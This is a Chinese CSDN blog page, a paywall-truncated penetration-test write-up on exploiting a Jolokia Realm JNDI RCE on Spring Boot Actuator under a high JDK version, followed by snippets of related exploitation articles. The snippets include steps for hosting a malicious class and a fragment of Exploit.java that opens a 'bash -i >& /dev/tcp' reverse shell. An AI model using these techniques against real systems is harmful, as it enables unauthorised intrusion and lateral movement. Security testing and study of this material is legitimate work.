高版本JDK下的Jolokia Realm JNDI RCE小记

最新推荐文章于 2024-09-13 07:26:45 发布
最新推荐文章于 2024-09-13 07:26:45 发布
阅读量3.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40418457/article/details/116424252
版权
本文记录了在渗透测试中遇到的一个高版本JDK环境下的Jolokia Realm JNDI远程代码执行漏洞利用过程。通过面向GitHub的渗透方法,尝试了不同exploit,并最终利用特定payload在高版本JDK中成功实现RCE。成功获取shell后,通过内网横向移动控制了多台主机。
摘要由CSDN通过智能技术生成

0x01 引言

在一个阳光明媚的下午,接到一个渗透测试项目。经过一波资产收集,发现一处jolokia,存在 type=MBeanFactory 和 createJNDIRealm。

https://api.example.com//actuator/jolokia/list

你没看错,这个资源必须//才能访问到。

0x02 一波三折的RCE

1. 本着面向github渗透,利用公开的poc打了一波。

引用:https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce

发现一个问题, marshalsec 接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。

2. 继续面向github渗透,利用https://githu

最低0.47元/天 解锁文章
火线安全
关注
Springboot之actuator配置不当漏洞RCEjolokia
墨痕诉清风的博客
10-25 4782
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
java错误:不支持发行版本5或java: 不再支持源选项 5。请使用 6 或更版本的解决方案
热门推荐
weixin_43178406的博客
07-15 6万+
本文主要介绍了java错误:不支持发行版本5或java: 不再支持源选项 5。请使用 6 或更版本的解决方案,希望能对学习java的同学们有所帮助。需要说明的是,需要同时对多处进行正确修改才能解决上述问题,具体解决方案参考博客中的详细内容。 文章目录 1. 问题描述 2. 解决方案
jolokia Realm JNDI RCE分析
12-09 2656
jolokia Realm JNDI RCE分析
jdk8u121以上 jolokia Realm JNDI RCE解决
为之的博客
12-02 1380
我的版本为java1.8.0_152,比121,但我想对其进行debug,又不想重装jdk或者虚拟机远程debug,就找了半天怎么解决,然后百度都是告诉你 com.sun.jndi.rmi.object.trustURLCodebase设置为true就好了,就始终没人教教我这个菜鸡怎么设置。 Environment要点一下扩展开,在里面输入命令点击OK就解决了,哎,太菜了。 -Dcom.sun.jndi.rmi.object.trustURLCodebase=true ...
JNDI-Injection-Exploit 项目使用教程
最新发布
gitblog_00727的博客
09-13 757
JNDI-Injection-Exploit 项目使用教程 JNDI-Injection-Exploit JNDI命令注入利用 项目地址: https://gitcode.com/gh_mirrors/jnd/JNDI-Injec...
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 4664
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
jolokia logback JNDI RCE
12-08 1484
jolokia logback JNDI RCE漏洞分析
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
08-03
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
绕过版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1767
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
Linux 已有版本jdk情况下如何安装低版本jdk
monkeyduck的专栏
03-05 5570
我们都知道如果是低版本jdk再安装版本会自动覆盖掉,但是如果有特殊需要,就是要用低版本的怎么办呢?假设linux有jdk1.6,但是需要1.5,完成这个只需4步: 1、找到原来jdk的位置,如果忘了也不要紧,再下一个就可以。以jdk1.5为例,链接在这 http://www.oracle.com/technetwork/java/javasebusiness/downloads/java-a
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3123
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
Spring actuator Jolokia XXE RCE实现(持续更新)
qq_36737214的博客
12-02 1119
背景:今天想实践一下actuator Jolokia XXE RCE的复现;复现过程中出现了很多的名词之前是没接触到的,就一此次复现做一个契机,补充一下自己需要知道的知识点 文章目录搭建HTTP服务器。供JMXConfigurator中提供的“reloadByURL”方法,引入外部xml文件。解析外部引入的xml,对插入JNDI部分解析并进行创建JNDI服务 需要了解的知识点如下:其中的每一点我基本上都会先一篇文章去整理。 思维导图地址地址:https://www.processon.com/mindm
红队实战攻防技术(一)
A_991128a的博客
07-28 113
大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写红队攻防相关的文章了,那么近期将带来 “红队实战攻防技术” 系列的文章。当前行业内组织的 “红蓝对抗演习”在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以红队的视角去阐述技术思想。与常规的渗透测试相比,红队攻防更多的是渗透思想上的差异,而我个人的理解认为。
Spring actuator Jolokia XXE RCE
qq_35533398的博客
10-07 1650
Jolokia XXE/RCE Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回: 格式化后logback Mbean: jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置 官网给出了GET和POST两种方式的访问路径以及参数: ..
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 5071
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7327
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
spring boot actuator RCE
问题很多的小明
06-27 2533
搭建漏洞环境: git clone https://github.com/veracode-research/actuator-testbed mvn install 或者 mvn spring-boot:run,如果遇到了报错,多半是因为网络问题导致本地mvn仓库下载不完全导致项目依赖解析出问题,解决办法点这里 本地访问一下: 关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/ 路径 描述 /autoconfig 提供了一
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
网络安全。
06-18 8771
0x01 漏洞原理 spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
Spring Boot Actuator RCE
weixin_30693683的博客
03-16 803
来看一下IDEA如何调试Spring Boot 先在https://github.com/artsploit/actuator-testbed下载源码 如下命令就能通过maven环境启动 mvn install mvn spring-boot:run 需要但开启调试模式,在pom.xml文件加入如下配置: <configuration> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值